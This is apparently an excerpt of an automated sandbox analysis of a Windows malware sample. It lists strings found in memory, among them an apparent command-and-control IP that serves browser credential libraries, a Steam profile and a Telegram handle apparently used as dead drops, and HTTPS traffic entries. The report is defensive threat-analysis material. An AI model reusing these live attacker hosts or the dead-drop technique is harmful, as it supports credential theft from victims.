Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: http://store.steampowered.com/privacy_agreement/
Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: http://store.steampowered.com/subscriber_agreement/
Source: Amcache.hve.6.dr	String found in binary or memory: http://upx.sf.net
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: mozglue.dll.1.dr, mozglue[1].dll.1.dr	String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: RegAsm.exe, 00000001.00000002.2462673623.0000000013EE8000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2466716295.0000000019E8D000.00000002.00001000.00020000.00000000.sdmp, sqln[1].dll.1.dr	String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: http://www.valvesoftware.com/legal.htm
Source: RegAsm.exe, 00000001.00000002.2461606471.0000000001530000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.244.9
Source: 76561199677575543[1].htm.1.dr	String found in binary or memory: https://95.217.244.99
Source: RegAsm.exe, 00000001.00000002.2461606471.0000000001493000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.0000000001530000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.244.99/
Source: RegAsm.exe, 00000001.00000002.2461606471.0000000001493000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.244.99/17.244.99/
Source: RegAsm.exe, 00000001.00000002.2461606471.0000000001493000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.244.99/B
Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.244.99/freebl3.dll
Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.244.99/mozglue.dll
Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.244.99/msvcp140.dll
Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.244.99/nss3.dll
Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.244.99/nss3.dlljL
Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.244.99/softokn3.dll-H
Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.244.99/softokn3.dllcH
Source: RegAsm.exe, 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.244.99/sqln.dll
Source: RegAsm.exe, 00000001.00000002.2461606471.0000000001493000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.244.99/vcruntime140.dll
Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014C5000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://95.217.244.99/vcruntime140.dllu
Source: RegAsm.exe, 00000001.00000002.2461081989.0000000000521000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.244.9910dd9827bbnt-Disposition:
Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.244.99AKFC
Source: RegAsm.exe, 00000001.00000002.2461081989.000000000051B000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://95.217.244.99EGHJ
Source: BAAFIJKK.1.dr	String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: RegAsm.exe, 00000001.00000002.2461606471.0000000001493000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://api.steampowered.com/
Source: 76561199677575543[1].htm.1.dr	String found in binary or memory: https://avatars.akamai.steamstatic.com/fef49e7fa7e1997310d705b2a6158ff8dc1cdfeb_full.jpg
Source: RegAsm.exe, 00000001.00000002.2461606471.0000000001493000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/
Source: BAAFIJKK.1.dr	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: BAAFIJKK.1.dr	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: BAAFIJKK.1.dr	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/applications/community/main.css?v=96N66CvLHly8&a
Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/globalv2.css?v=PAcV2zMBzzSV&l=english
Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/promo/summer2017/stickers.css?v=HA2Yr5oy3FFG&amp
Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/header.css?v=NFoCa4OkAxRb&l=english
Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/modalContent.css?v=.TP5s6TzX6LLh
Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/css/skin_1/profilev2.css?v=M_qL4gO2sKII&l=englis
Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/arrowDn9x5.gif
Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/images/skin_1/footerLogo_valve.png?v=1
Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/libraries~b28b7af6
Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/main.js?v=Kg_v7CMM
Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/applications/community/manifest.js?v=C4Kx
Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/global.js?v=B7Vsdo1okyaC&l=english
Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=.isFTSRckeNhC
Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalContent.js?v=L35TrLJDfqtD&l=engl
Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/modalv2.js?v=dfMhuy-Lrpyo&l=english
Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/profile.js?v=Iy1ies1ROjUT&l=english
Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=-zPAhzrcAAqx&l=e
Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
Source: 76561199677575543[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=SPpMitTYp6ku&l=en
Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=BMF068jICwP9&
Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=1_BxDGVvfXwv&am
Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
Source: BAAFIJKK.1.dr	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: BAAFIJKK.1.dr	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: BAAFIJKK.1.dr	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://help.steampowered.com/en/
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: https://mozilla.org0/
Source: RegAsm.exe, 00000001.00000002.2461606471.0000000001493000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: 76561199677575543[1].htm.1.dr	String found in binary or memory: https://steamcommunity.com/
Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: RegAsm.exe, 00000001.00000002.2461606471.0000000001493000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/H
Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://steamcommunity.com/discussions/
Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: 76561199677575543[1].htm.1.dr	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199677575543
Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://steamcommunity.com/market/
Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: file.exe, file.exe, 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000001.00000002.2461606471.0000000001493000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199677575543
Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199677575543/badges
Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://steamcommunity.com/profiles/76561199677575543/inventory/
Source: file.exe, 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199677575543Mozilla/5.0
Source: RegAsm.exe, 00000001.00000002.2461606471.0000000001493000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199677575543w
Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://steamcommunity.com/workshop/
Source: 76561199677575543[1].htm.1.dr	String found in binary or memory: https://store.steampowered.com/
Source: 76561199677575543[1].htm.1.dr	String found in binary or memory: https://store.steampowered.com/about/
Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://store.steampowered.com/explore/
Source: RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://store.steampowered.com/legal/
Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://store.steampowered.com/mobile
Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://store.steampowered.com/news/
Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://store.steampowered.com/stats/
Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
Source: file.exe, file.exe, 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, RegAsm.exe, 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/snsb82
Source: file.exe, 00000000.00000002.2129837394.000000000051F000.00000004.00000001.01000000.00000003.sdmp, RegAsm.exe, 00000001.00000002.2461081989.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://t.me/snsb82At
Source: nss3.dll.1.dr, mozglue.dll.1.dr, freebl3.dll.1.dr, mozglue[1].dll.1.dr, nss3[1].dll.1.dr, freebl3[1].dll.1.dr, softokn3[1].dll.1.dr, softokn3.dll.1.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: BAAFIJKK.1.dr	String found in binary or memory: https://www.ecosia.org/newtab/
Source: BAAFIJKK.1.dr	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: RegAsm.exe, 00000001.00000002.2461606471.0000000001493000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/recaptcha/
Source: RegAsm.exe, 00000001.00000002.2461606471.0000000001493000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.cn/recaptcha/
Source: RegAsm.exe, 00000001.00000002.2461606471.0000000001493000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com/recaptcha/
Source: RegAsm.exe, 00000001.00000002.2461081989.000000000043A000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000001.00000002.2461606471.00000000014AF000.00000004.00000020.00020000.00000000.sdmp, 76561199677575543[1].htm.1.dr	String found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49727 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49725 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49718
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49711
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49711 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49726 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49724 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49728 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49728
Source: unknown	Network traffic detected: HTTP traffic on port 49714 -> 443
